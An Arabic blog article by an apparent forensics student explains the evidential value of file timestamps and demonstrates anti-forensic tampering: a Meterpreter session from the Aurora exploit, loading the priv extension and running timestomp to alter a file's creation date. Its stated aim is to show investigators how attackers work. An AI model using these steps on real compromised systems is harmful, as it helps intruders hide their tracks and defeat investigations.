أهمية البيانات الوصفية كدليل في التحقيق الجنائي الرقمي. مقال يوضح الأساليب التي يستخدمها المخربين في العبث وتعديل البيانات الوصفية الخاصة بالملفات بإستخدام أداة مثل timestomp الموجودة في مشروع ميتاسبلويت.

 

أكثر ما يحرص عليه المحقق الجنائي في حال الحصول على دليل رقمي هو عدم فتح أو تعديل الدليل حتى لا يقوم بتعديل السجلات الموجودة في البيانات الوصفية وبالذات الوقت الذي تم إنشاء فيه الملف وتعديله, وما أهمية الوقت؟ يفيدنا معرفة التوقيت حتى يساعدنا ذلك في عملية التحقيق عن الجريمة من حيث ماهي آخر الملفات التي قام الجاني بإنشائها أو تعديلها. وبشكل آخر أيضاً في حال تم اختراق جهاز ما ويريد المحقق معرفة ماهي الملفات التي قام المخترق بالعبث بها سواء من تعديل أو فتح لملف معين, لذلك أكثر ما يعرقل أي محقق جنائي هو عدم التمكن من حصول على بيانات التوقيت لأي دليل رقمي.

يستغرب بعض مستخدمي أجهزة الكاميرا من أن الصور التي قاموا بإلتقاطها عند استعراضها او تحميلها من الكاميرا مسماها ماهو الا عشر ارقام عشوائية على سبيل المثال:

1281002492.jpg

وفي الحقيقة أن هذا الرقم ماهو إلا التاريخ والوقت الذي تم إلتقاط الصورة فيه ولكن بإستخدام توقيت UNIX/POSX حيث بعد تحويله إلى توقيت عادي سوف يكون معنى العشر أرقام هذه كالتالي:

التاريخ الذي تم إلتقاط فيه الصورة: 05-08-2010

الساعة التي تم إلتقاط فيها الصورة: العاشرة صباحاً ودقيقة واحدة و 32 ثانية.

حيث إذا كانت هذه الصورة دليل رقمي قاطع تم العبث في توقيتها لتمكنا من حل هذه القضية من إسم الملف!

 

التطبيق:

سوف أقوم بشرح الطريقة التي يستخدمها أغلب المخربين وهي عن طريق الأداة Timestomp, هذه الأداة تقوم بتعديل التوقيت في البيانات الوصفية لملفات الويندوز دون ترك أي أثر وراءه ! حيث تأتي هذه الأداة مع مشروع Metasploit عند اختيار Meterpreter كـ Payload .

يمكنكم تحميله كأداة منفصلة عن طريق: اضغط هنا و الكود المصدري من هنا

لنفترض بأن المخترق قام بإختراق الجهاز بإحدى ثغرات الاكسبلورر عن طريق ميتاسبلويت :

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > cd C:

وعلى سبيل المثال هناك ملف مهم او يحتوي على بيانات حساسة في المسار وإسمه SPECIAL.txt كما هو واضح في القائمة التالية:

meterpreter > ls
Listing: C:
Mode Size Type Last modified Name
—- —- —- ————- —-
100777/rwxrwxrwx 0 fil 2010-08-19 20:15:21 +0300 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2010-08-19 20:15:21 +0300 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2010-08-19 20:19:17 +0300 Documents and Settings
100444/r–r–r– 0 fil 2010-08-19 20:15:21 +0300 IO.SYS
100444/r–r–r– 0 fil 2010-08-19 20:15:21 +0300 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-14 15:00:00 +0300 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2010-08-20 18:10:41 +0300 Program Files
100666/rw-rw-rw- 77 fil 2010-10-05 20:36:37 +0300 SPECIAL.txt
40777/rwxrwxrwx 0 dir 2010-08-20 18:28:06 +0300 System Volume Information
40777/rwxrwxrwx 0 dir 2010-08-20 16:01:37 +0300 WINDOWS
100666/rw-rw-rw- 211 fil 2010-08-19 20:12:37 +0300 boot.ini
100444/r–r–r– 250048 fil 2008-04-14 15:00:00 +0300 ntldr
100666/rw-rw-rw- 1610612736 fil 2010-10-05 18:05:00 +0300 pagefile.sys

 

الآن لتشغيل Timestomp يجب علينا تشغيل هذا المودل:

meterpreter > use priv
Loading extension priv…success.

 

ثم بعد ذلك يمكننا تشغيل الأداة وإستخدامها :

meterpreter > timestomp
Usage: timestomp file_path OPTIONS
OPTIONS:
-a <opt> Set the “last accessed” time of the file
-b Set the MACE timestamps so that EnCase shows blanks
-c <opt> Set the “creation” time of the file
-e <opt> Set the “mft entry modified” time of the file
-f <opt> Set the MACE of attributes equal to the supplied file
-h Help banner
-m <opt> Set the “last written” time of the file
-r Set the MACE timestamps recursively on a directory
-v Display the UTC MACE values of the file
-z <opt> Set all four attributes (MACE) of the file

 

خصائص البرنامج واضحة لنقوم بعرض بيانات الملف SPECIAL.txt عن طريق الأداة:

meterpreter > timestomp SPECIAL.txt -v
Modified : 2010-10-05 21:36:07 +0300
Accessed : 2010-10-05 21:36:07 +0300
Created : 2010-10-05 20:35:36 +0300
Entry Modified: 2010-10-05 21:36:07 +0300

 

لنقم بتعديل التاريخ الذي تم إنشاء فيه الملف على سبيل المثال ومن ثم نستعرض البيانات الخاصة بالملف بعد تعديله:

meterpreter > timestomp SPECIAL.txt -c ’09/01/2010 13:15:33′
meterpreter > timestomp SPECIAL.txt -v
Modified : 2010-10-05 21:36:07 +0300
Accessed : 2010-10-05 21:36:07 +0300
Created : 2009-09-01 13:15:33 +0300
Entry Modified: 2010-10-05 21:36:07 +0300

هذه صورة للملف بعد تم التعديل عليه من نافذة الخصائص الخاصة بنظام ويندوز وكما يتضح فيها فإن التعديل تم بنجاح بدون التأثير على الملف أو بقية البيانات الخاصة به:

timestomp

لم أكتب هذه المقالة حتى أساعد المخربين, لكني كتبتها لتوضيح الطريقة التي تستخدمها هذه الفئة 🙂 في حال وجود أي اسألة أتمنى عدم التردد.

عن الكاتب:


ساري بخاري, طالب جامعي في قسم التحقيق الجنائي الرقمي في بريطانيا, لدي خبرة واسعة في البرمجة والحماية والتصميم والتعامل مع أنظمة اللينوكس.

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedIn